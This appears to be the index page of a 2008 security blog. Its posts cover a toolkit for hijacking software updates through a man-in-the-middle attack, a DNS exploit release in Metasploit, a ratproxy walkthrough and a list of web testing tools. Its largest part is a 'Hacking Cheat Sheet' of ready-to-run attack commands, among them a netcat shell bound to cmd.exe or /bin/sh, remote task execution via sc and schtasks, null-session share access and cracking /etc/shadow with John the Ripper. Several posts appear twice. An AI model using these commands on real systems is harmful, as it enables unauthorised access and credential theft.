Demo video available!
A toolkit for exploiting products which perform online updates. (MITM attack is required here!)
The demo will show us how to "exploit" Sun Java updates, using the recent DNS flaw (exploits available in Metasploit) for the MITM attack.
Tuesday, July 29, 2008
Saturday, July 26, 2008
Exploit for Dan's DNS bug goes online!
It's now available in Metasploit
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
So, update your DNS Server now!
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
So, update your DNS Server now!
Sunday, July 6, 2008
ratproxy - another web application security tool
ratproxy - [BETA] a semi-automated web application security tool, which allow you to analyse problems such as XSS, insufficient CSRF defenses, caching issues, and much more while browsing the site.
Step 1: Run the tool and only capture domain "arlinz.blogspot.com"
$ ./ratproxy -v arlinz.dir -w arlinz.file -d arlinz.blogspot.com -lextifscgjm
ratproxy version 1.51-beta by
[*] Proxy configured successfully. Have fun, and please do not be evil.
[+] Accepting connections on port 8080/tcp (local only)...
Step 3: Generate the report
$ ./ratproxy-report.sh arlinz.file > report.htm
Step 4: Review the report
Some report from other site:
Step 1: Run the tool and only capture domain "arlinz.blogspot.com"
$ ./ratproxy -v arlinz.dir -w arlinz.file -d arlinz.blogspot.com -lextifscgjm
ratproxy version 1.51-beta by
[*] Proxy configured successfully. Have fun, and please do not be evil.
[+] Accepting connections on port 8080/tcp (local only)...
Step 3: Generate the report
$ ./ratproxy-report.sh arlinz.file > report.htm
Step 4: Review the report
Some report from other site:
Saturday, July 5, 2008
Hacking Cheat Sheet
####################
#Reconnaissance #
####################
---------------------
- DNS Zone Transfer -
---------------------
Windows: nslookup
server [DNS SERVER]
ls -d [domain.net]
UNIX: dig @[DNS SERVER] [domain.net] -t AXFR
####################
# Scanning #
####################
--------
- NMAP -
--------
# nmap -sS -sV -O -PI [IP Address/Range]
-sS (SYN Stealth Scan)
-sV (Version Probe)
-O (OS Detection)
-PI (Ping target - ICMP Echo to check if server alive)
-----------------
- Windows - Net -
-----------------
> net use \\hostname "" /U:""
> net use
> net sessions
> net view \\hostname
> net use * /del
> net time \\hostname
> net use * \\hostname\c$ [password] /u:[domain\userid]
####################
# Exploting #
####################
----------
- NetCat -
----------
> nc -l -p [PORT NO]
> nc [HOST IP] [PORT NO]
> nc -l -p [PORT NO] -e cmd.exe | /bin/sh
> nc -l -p [SOURCE PORT NO] 0backpipe (create backpipe with 'mknod backpipe p')
----------------------
- Windows SC command -
----------------------
> net start -> show all the service
> sc \\hostname start schedule
> sc \\hostname start
> at \\hostname [time in A/P format] [run command]
> (VISTA ONLY!) schtasks /create /s [target IP] /ru "system" /sc once /st 20:45:00 /sd mm/dd/yyyy /tn [program name] /tr [full path with program name]
-----------------------
- Password Crack UNIX -
-----------------------
# unshadow /etc/passwd /etc/shadow > /tmp/combined
# john /tmp/combined
--------------------------
- Password Crack WINDOWS -
--------------------------
# use pwdump3 or fgdump
# crack with John the Ripper or Cain & Abel
#Reconnaissance #
####################
---------------------
- DNS Zone Transfer -
---------------------
Windows: nslookup
server [DNS SERVER]
ls -d [domain.net]
UNIX: dig @[DNS SERVER] [domain.net] -t AXFR
####################
# Scanning #
####################
--------
- NMAP -
--------
# nmap -sS -sV -O -PI [IP Address/Range]
-sS (SYN Stealth Scan)
-sV (Version Probe)
-O (OS Detection)
-PI (Ping target - ICMP Echo to check if server alive)
-----------------
- Windows - Net -
-----------------
> net use \\hostname "" /U:""
> net use
> net sessions
> net view \\hostname
> net use * /del
> net time \\hostname
> net use * \\hostname\c$ [password] /u:[domain\userid]
####################
# Exploting #
####################
----------
- NetCat -
----------
> nc -l -p [PORT NO]
> nc [HOST IP] [PORT NO]
> nc -l -p [PORT NO] -e cmd.exe | /bin/sh
> nc -l -p [SOURCE PORT NO] 0
----------------------
- Windows SC command -
----------------------
> net start -> show all the service
> sc \\hostname start schedule
> sc \\hostname start
> at \\hostname [time in A/P format] [run command]
> (VISTA ONLY!) schtasks /create /s [target IP] /ru "system" /sc once /st 20:45:00 /sd mm/dd/yyyy /tn [program name] /tr [full path with program name]
-----------------------
- Password Crack UNIX -
-----------------------
# unshadow /etc/passwd /etc/shadow > /tmp/combined
# john /tmp/combined
--------------------------
- Password Crack WINDOWS -
--------------------------
# use pwdump3 or fgdump
# crack with John the Ripper or Cain & Abel
Tuesday, January 8, 2008
WebApp Security Testing Catalog
Yet another (if there are any) Web application security testing tool's catalog [beta version].
The main idea is to provide a catalog of Web application security tools (something like FireCAT)
[Beta Version] includes list of:
- Scanners (commercial and free)
- Proxy
- SQL Injection
- HTTP Header
- Session Management
- AJAX
- Flash
- Java Applet
- Browser
[To be added in future release]:
- Source code analyst (commercial and free)
- .Net/ASP
- Web Services
The main idea is to provide a catalog of Web application security tools (something like FireCAT)
[Beta Version] includes list of:
- Scanners (commercial and free)
- Proxy
- SQL Injection
- HTTP Header
- Session Management
- AJAX
- Flash
- Java Applet
- Browser
[To be added in future release]:
- Source code analyst (commercial and free)
- .Net/ASP
- Web Services
Subscribe to:
Posts (Atom)
